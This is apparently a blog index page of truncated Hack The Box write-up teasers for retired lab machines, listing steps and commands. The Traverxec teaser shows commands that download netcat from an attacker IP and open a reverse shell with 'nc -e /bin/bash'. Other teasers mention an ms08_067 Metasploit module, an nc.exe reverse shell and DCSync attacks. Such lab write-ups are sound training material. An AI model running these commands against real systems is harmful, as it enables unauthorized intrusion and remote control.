Hack the box Brainfuck writeup 5 (8)

Brief It is a retired machine from hack the box. It’s a linux insane machine . Steps involved 1-Port scanning2-Enumerating SSLcertificates3-Editing our host file4-Exploiting WP Support Plus5-Getting email password6-Getting creds for secret form7-Decoding Vigenere ciphers8-Decrypting the id_rsa keyprase9-Getting user.txt10-Decrypting the […]

Hack the box(HTB) Traverxec write up 0 (0)

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py […]

Hack the box(HTB) Legacy writeup 0 (0)

Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial 10.10.10.4 msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module […]

Hack the box(HTB) Registry writeup 0 (0)

Introduction Registry is a retired machine from the platform hack the box and writeups of retired machines are only allowed. Registry is a HARD machine of worth points 40. Steps Nmap scan Enumerating webpages Exploiting docker Getting docker blobs Getting […]

Hack the box(HTB) Sniper write up 0 (0)

Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV 10.10.10.151 nano /etc/samba/smb.conf service smbd start nc.exe 10.10.14.39 […]

Hackthebox(HTB) Forest Detailed Writeup | walkthrough 0 (0)

Steps: Nmap Scan. Enumerating user names. Exploiting Kerberos Decryption of hash.txt. Login with Evil-winrm(user) Uploading Blood hound Adding User to group. Escalating the privilages. DCSync attack via secretsdump Login with wmiexec.py(root) Tools used Impacket(GetNPUsers.py,ntlmrelayx.py ,secretsdump.py) Evil-winrm Bloodhound. Commands used nmap […]